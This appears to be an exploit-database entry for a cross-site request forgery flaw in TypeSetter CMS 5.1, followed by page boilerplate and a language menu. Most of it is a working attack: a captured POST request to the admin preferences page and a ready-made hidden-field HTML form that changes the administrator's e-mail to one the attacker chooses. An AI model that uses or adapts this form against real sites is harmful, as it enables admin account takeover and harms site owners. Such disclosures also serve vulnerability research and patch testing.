Date: 2020-12-01
CVE: N/A
Platform: PHP
# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Kali & ubuntu
# Category: WebApp
######## Description ########
Attacker can change admin e-mail address
## Vulnerable
- Go to the admin page view preferences
- Change the e-mail address
######## Proof of Concept ########
===> REQUEST <====
POST /typesetter/Admin/Preferences HTTP/1.1
Host: http://localhost/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Origin: http://localhost/
Connection: close
Referer: http://localhost/typesetter/Admin/Preferences
## < SNIPP >
verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save
#### Attack Code ####
<html>
<body>
<form action="http://localhost/typesetter/Admin/Preferences" method="POST">
<input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />
<input type="hidden" name="email" value="[CHANGE HERE]" />
<input type="hidden" name="oldpassword" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="password1" value="" />
<input type="hidden" name="algo" value="password_hash" />
<input type="hidden" name="cmd" value="changeprefs" />
<input type="hidden" name="aaa" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>719 total views, 2 views today
English
Afrikaans
Albanian
Amharic
Arabic
Armenian
Azerbaijani
Basque
Belarusian
Bengali
Bosnian
Bulgarian
Catalan
Cebuano
Chichewa
Chinese (Simplified)
Chinese (Traditional)
Corsican
Croatian
Czech
Danish
Dutch
Esperanto
Estonian
Filipino
Finnish
French
Frisian
Galician
Georgian
German
Greek
Gujarati
Haitian Creole
Hausa
Hawaiian
Hebrew
Hindi
Hmong
Hungarian
Icelandic
Igbo
Indonesian
Irish
Italian
Japanese
Javanese
Kannada
Kazakh
Khmer
Korean
Kurdish (Kurmanji)
Kyrgyz
Lao
Latin
Latvian
Lithuanian
Luxembourgish
Macedonian
Malagasy
Malay
Malayalam
Maltese
Maori
Marathi
Mongolian
Myanmar (Burmese)
Nepali
Norwegian
Pashto
Persian
Polish
Portuguese
Punjabi
Romanian
Russian
Samoan
Scottish Gaelic
Serbian
Sesotho
Shona
Sindhi
Sinhala
Slovak
Slovenian
Somali
Spanish
Sudanese
Swahili
Swedish
Tajik
Tamil
Telugu
Thai
Turkish
Ukrainian
Urdu
Uzbek
Vietnamese
Welsh
Xhosa
Yiddish
Yoruba
Zulu